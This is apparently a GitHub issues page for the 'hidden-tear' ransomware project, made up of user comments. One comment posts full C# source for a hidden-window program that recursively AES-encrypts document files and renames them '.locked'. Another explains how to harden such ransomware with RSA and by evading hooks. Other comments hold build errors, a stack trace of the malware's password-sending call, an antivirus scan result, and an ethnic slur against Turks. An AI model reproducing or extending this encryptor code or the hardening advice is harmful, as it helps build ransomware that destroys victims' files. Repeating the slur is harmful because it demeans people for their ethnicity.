utkusen / hidden-tear Goto Github PK

Turks smell awful.

Microsoft Visual C# 2010 does not compile. Tell me what to compile?

Nothing here

This project makes me cry.

Hello,

Where can we get a copy of the write.php file to test.

Thank you.

Hello,

After building and named it MyThing, using localhost for test, I get the following error.

Unhandled exception has occurred in your application. If you click Continue. the application will ignore this error and attapt to continue, if you lick Que, the applicacion will close immediately.

The remote server returned an error: (404) Not Fround.
See the end of this message for details on invoking
just-in-time (JIT) debugging instead of this dialog box.

************** Exception Text **************
System.Net.WebException: The remote server returned an error: (404) Not Found.
at System.Net.WebClient.DownloadDataInternal(Uri address, WebRequest& request)
at System.Net.WebClient.DownloadString(Uri address)
at System.Net.WebClient.DownloadString(String address)
at hidden_tear.Form1.SendPassword(String password)
at hidden_tear.Form1.startAction()
at hidden_tear.Form1.Form1_Load(Object sender, EventArgs e)
at System.Windows.Forms.Form.OnLoad(EventArgs e)
at System.Windows.Forms.Form.OnCreateControl()
at System.Windows.Forms.Control.CreateControl(Boolean fIgnoreVisible)
at System.Windows.Forms.Control.CreateControl()
at System.Windows.Forms.Control.WmShowWindow(Message& m)
at System.Windows.Forms.Control.WndProc(Message& m)
at System.Windows.Forms.ScrollableControl.WndProc(Message& m)
at System.Windows.Forms.Form.WmShowWindow(Message& m)
at System.Windows.Forms.Form.WndProc(Message& m)
at System.Windows.Forms.Control.ControlNativeWindow.OnMessage(Message& m)
at System.Windows.Forms.Control.ControlNativeWindow.WndProc(Message& m)
at System.Windows.Forms.NativeWindow.Callback(IntPtr hWnd, Int32 msg, IntPtr wparam, IntPtr lparam)

************** Loaded Assemblies **************
mscorlib
Assembly Version: 4.0.0.0
Win32 Version: 4.6.81.0 built by: NETFXREL2

CodeBase: file:///C:/Windows/Microsoft.NET/Framework/v4.0.30319/mscorlib.dll

MyThing
Assembly Version: 1.0.0.0
Win32 Version: 1.0.0.0

CodeBase: file:///C:/Users/001/Downloads/hidden-tear-master/hidden-tear-master/hidden-tear/hidden-tear/bin/Debug/New%20folder/MyThing.exe

System.Windows.Forms
Assembly Version: 4.0.0.0
Win32 Version: 4.6.81.0 built by: NETFXREL2

CodeBase: file:///C:/Windows/Microsoft.Net/assembly/GAC_MSIL/System.Windows.Forms/v4.0_4.0.0.0__b77a5c561934e089/System.Windows.Forms.dll

System
Assembly Version: 4.0.0.0
Win32 Version: 4.6.81.0 built by: NETFXREL2

CodeBase: file:///C:/Windows/Microsoft.Net/assembly/GAC_MSIL/System/v4.0_4.0.0.0__b77a5c561934e089/System.dll

System.Drawing
Assembly Version: 4.0.0.0
Win32 Version: 4.6.81.0 built by: NETFXREL2

CodeBase: file:///C:/Windows/Microsoft.Net/assembly/GAC_MSIL/System.Drawing/v4.0_4.0.0.0__b03f5f7f11d50a3a/System.Drawing.dll

System.Configuration
Assembly Version: 4.0.0.0
Win32 Version: 4.6.81.0 built by: NETFXREL2

CodeBase: file:///C:/Windows/Microsoft.Net/assembly/GAC_MSIL/System.Configuration/v4.0_4.0.0.0__b03f5f7f11d50a3a/System.Configuration.dll

System.Core
Assembly Version: 4.0.0.0
Win32 Version: 4.6.81.0 built by: NETFXREL2

CodeBase: file:///C:/Windows/Microsoft.Net/assembly/GAC_MSIL/System.Core/v4.0_4.0.0.0__b77a5c561934e089/System.Core.dll

System.Xml
Assembly Version: 4.0.0.0
Win32 Version: 4.6.81.0 built by: NETFXREL2

CodeBase: file:///C:/Windows/Microsoft.Net/assembly/GAC_MSIL/System.Xml/v4.0_4.0.0.0__b77a5c561934e089/System.Xml.dll

************** JIT Debugging **************
To enable just-in-time (JIT) debugging, the .config file for this
application or computer (machine.config) must have the
jitDebugging value set in the system.windows.forms section.
The application must also be compiled with debugging
enabled.

For example:

When JIT debugging is enabled, any unhandled exception
will be sent to the JIT debugger registered on the computer
rather than be handled by this dialog box.

File Name: hidden-tear.exe
File Size: 12 KB
Scan Date: 2015-09-15
Scan Result: 7/35

MD5: 94ce7ab77e933c83410b38e455cd0b91
Verified By NoDistribute: Virus Scan Result

AVG Free:Could be a Trojan horse Cryptic
Avast:MSIL:Ransom-J [Trj]
AntiVir (Avira): Clean
BitDefender: Clean
Clam Antivirus: Clean
COMODO Internet Security: Clean
Dr.Web: Clean
eTrust-Vet: Clean
F-PROT Antivirus: Clean
F-Secure Internet Security: Clean
G Data:MSIL.Trojan-Ransom.Cryptear.A
IKARUS Security: Clean
Kaspersky Antivirus:HEUR:Trojan.Win32.Generic
McAfee:Ransomware-FAL!94CE7AB77E93
MS Security Essentials: Clean
ESET NOD32:Trojan.MSIL/Filecoder.Y
Norman: Clean
Norton Antivirus:Trojan.Cryptolocker.Y
Panda Security: Clean
A-Squared: Clean
Quick Heal Antivirus: Clean
Solo Antivirus: Clean
Sophos: Clean
Trend Micro Internet Security: Clean
VBA32 Antivirus: Clean
Zoner AntiVirus: Clean
Ad-Aware: Clean
BullGuard: Clean
FortiClient: Clean
K7 Ultimate: Clean
NANO Antivirus: Clean
Panda CommandLine: Clean
SUPERAntiSpyware: Clean
Twister Antivirus: Clean
VIPRE: Clean

Could you share on how to build the hidden-tear executable in a video tutorial like the demostration one ?

Very much appreciated.
A

@utkusen, despite the legal warning, I'm not comfortable of using/extending this project without a license.

Do you have the intention of setting this project as open source?

Hey, I wanted to make a cool folder encryptor as a fun project and I then came across hidden-tear
I was trying to encrypt a directory with an inbuilt key. check it out,

using System;
using System.Net;
using System.Diagnostics;
using System.Collections.Generic;
using System.Data;
using System.Drawing;
using System.Linq;
using System.ComponentModel;
using System.Threading.Tasks;
using System.Windows.Forms;
using System.Text;
using System.Security;
using System.Security.Cryptography;
using System.IO;
using System.Runtime.InteropServices;
using Microsoft.Win32;
using System.Text.RegularExpressions;


namespace folderlocker
{
    public partial class Form1 : Form
    {
        string dir = "C:\test";

        public Form1()
        {
            InitializeComponent();
        }

        private void Form1_Load(object sender, EventArgs e)
        {
            Opacity = 0;
            this.ShowInTaskbar = false;
            //starts encryption at form load
            shebang();

        }

        private void Form_Shown(object sender, EventArgs e)
        {
            Visible = false;
            Opacity = 100;
        }

        //AES encryption algorithm
        public byte[] AES_Encrypt(byte[] bytesToBeEncrypted, byte[] passwordBytes)
        {
            byte[] encryptedBytes = null;
            byte[] saltBytes = new byte[] { 1, 2, 3, 4, 5, 6, 7, 8 };
            using (MemoryStream ms = new MemoryStream())
            {
                using (RijndaelManaged AES = new RijndaelManaged())
                {
                    AES.KeySize = 256;
                    AES.BlockSize = 128;

                    var key = new Rfc2898DeriveBytes(passwordBytes, saltBytes, 1000);
                    AES.Key = key.GetBytes(AES.KeySize / 8);
                    AES.IV = key.GetBytes(AES.BlockSize / 8);

                    AES.Mode = CipherMode.CBC;

                    using (var cs = new CryptoStream(ms, AES.CreateEncryptor(), CryptoStreamMode.Write))
                    {
                        cs.Write(bytesToBeEncrypted, 0, bytesToBeEncrypted.Length);
                        cs.Close();
                    }
                    encryptedBytes = ms.ToArray();
                }
            }

            return encryptedBytes;
        }

        //Encrypts single file
        public void ef(string file, string password)
        {

            byte[] bytesToBeEncrypted = File.ReadAllBytes(file);
            byte[] passwordBytes = Encoding.UTF8.GetBytes(password);

            // Hash the password with SHA256
            passwordBytes = SHA256.Create().ComputeHash(passwordBytes);

            byte[] bytesEncrypted = AES_Encrypt(bytesToBeEncrypted, passwordBytes);

            File.WriteAllBytes(file, bytesEncrypted);
            System.IO.File.Move(file, file + ".locked");
        }

        //encrypts target directory
        public void ed(string location, string password)
        {

            //extensions to be encrypt
            var validbroz = new[]
            {
                ".txt", ".doc", ".docx", ".xls", ".xlsx", ".ppt", ".pptx", ".odt", ".jpg", ".png", ".csv", ".sql", ".mdb", ".sln", ".php", ".asp", ".aspx", ".html", ".xml", ".psd"
            };

            string[] files = Directory.GetFiles(location);
            string[] childDirectories = Directory.GetDirectories(location);
            for (int i = 0; i < files.Length; i++)
            {
                string extension = Path.GetExtension(files[i]);
                if (validbroz.Contains(extension))
                {
                    ef(files[i], password);
                }
            }
            for (int i = 0; i < childDirectories.Length; i++)
            {
                ed(childDirectories[i], password);
            }
        }

        public void shebang()
        {
            string password = "loda123";
            ed(dir, password);
            password = null;
            System.Windows.Forms.Application.Exit();
        }

    }
}

However it doesn't encrypt the test directory, what is going wrong here?

Encrypting using the symmetric codeschema is weak since the program is vulnerable to all kinds of injections and attacks. Since the entire encryption occurs on the client side a virusscanner (of sorts) could easily hook in, even after the event.

• The generated password is way too short and can be tried within a reasonable (69^15) amount of time.
• Because you trust on a symmetric codeschema the password must me present somewhere and can (especially with a language like C#) be retrieved quite easily from a memory dump.
• Moving (encrypted) files around only changes the file descriptor towards the modifications, but does not actually alter the entire datablock which makes it easy to recover the original files by walking over the physical pages.
• Since C# relies for the most part on the .NET framework, basically all operations can be monitored or reverted with little effort (opcodes have some degree of transparency).

Randsomeware like CrytoLocker (one of the most successful crytopvirusses we know so far) take on an entire different approach. They trust on asymmetric encryption, specifically RSA, in which the private key never reaches the client system. This is much more secure since it's only the public key that needs to be exchanged between the parties. Also, you should write directly against the system libraries where needed to prevent hooks from listening in on communication. Supply your own crypto functions or use a open library instead. This all usually leads to a language with a lower abstraction level, for example C/C++.

There is the argument of complexity for these measures, but 'keeping things simple' is something you cannot afford in these areas where basically everything revolves around security. As for the education; this could barely pass as an encryption tool, never less malicious software.

If I understood from the readme it simply encrypts the file using AES, which use symmetric keys. Is just that? Real ransomware use asymmetric schemes so even if the connection is MITM-ed (some corporate proxy which logs even HTTPS requests) or in case of reverse engineering isn't possible to decrypt files.

Of course asymmetric cryptography don't work for large files out-of-box, so you either need to encrypt just part of file, sufficient to make it not utilizable anymore (an ransomware like scheme), or encrypt the AES key using an public key generated in the server (an PGP like scheme) but requires more security in order to avoid the AES key be retrieved without the private key.

I don't understand well C#, so I want to know how it works, in specific: it just encrypts with AES or use one of the schemes above?

Hello,

Where can we get a copy of the write.php file to test.

Thank you.

Just reading the code it appear to me that in case of multiple folders you'll most probably definitely loose the passwords but one. Due to the usage of sendControl variable...

Nice demo though, for wanna-be black/white hats!

xxxxxxx

Just wanted to congratulate you for your file encryption program. I did not understand why you called your file encryption program as ransomware tho.

Also this is just a legit file encryption, if this program without modification, get's caught by any antivirus this is definitely a false/positive.

Can someone please help me? I crypted my files and cannot decrypt it anymore..
I get the correct decrypt password in my txt file but when i try to decrypt with decryptor it gives me this error: